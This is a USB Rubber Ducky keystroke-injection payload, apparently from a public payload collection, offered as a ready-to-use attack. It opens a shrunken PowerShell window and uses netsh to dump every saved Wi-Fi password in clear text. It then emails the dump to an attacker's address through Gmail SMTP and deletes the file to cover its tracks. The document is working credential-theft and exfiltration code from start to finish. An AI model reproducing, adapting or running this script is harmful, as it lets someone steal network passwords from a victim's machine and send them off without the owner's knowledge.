REM ---------------
REM Source: https://github.com/TylerPaplham/Rubber-Ducky-Payloads
REM Script to steal Wifi Passwords and email them via PowerShell
REM ---------------
DELAY 400
GUI m
DELAY 200
GUI r
DELAY 100
STRING powershell -noexit -command "mode con cols=15 lines=1"
ENTER
DELAY 300
REM ---------------
REM Create wifi dump file
REM ---------------
STRING $profiles = ((netsh wlan show profiles) -match '\s{2,}:\s') -replace '.*:\s' , ''; foreach($profile in $profiles){netsh wlan show profile $profile key=clear >> wifi_dump.txt}
ENTER
DELAY 4000
REM ---------------
REM Email wifi dump file
REM ---------------
STRING $Recipient = 'recipient@example.com'; $Sender = 'sender@example.com'; $Password = 'sender_password'; $Subject = 'Wifi Dump'; $Body = 'Custom Message'; $SMTPServer = 'smtp.gmail.com'; $CreatedFile = 'wifi_dump.txt'; $SMTPMessage = New-Object System.Net.Mail.MailMessage($Sender,$Recipient,$Subject,$Body); $Attachment = New-Object System.Net.Mail.Attachment($CreatedFile); $SMTPMessage.Attachments.Add($Attachment); $SMTPClient = New-Object Net.Mail.SmtpClient($SmtpServer, 587); $SMTPClient.EnableSsl = $true; $SMTPClient.Credentials = New-Object System.Net.NetworkCredential($Sender, $Password); $SMTPClient.Send($SMTPMessage);
ENTER
DELAY 6000
REM ---------------
REM Delete wifi dump file
REM ---------------
STRING Remove-Item 'wifi_dump.txt'
DELAY 100
ENTER
DELAY 400
STRING exit
DELAY 100
ENTER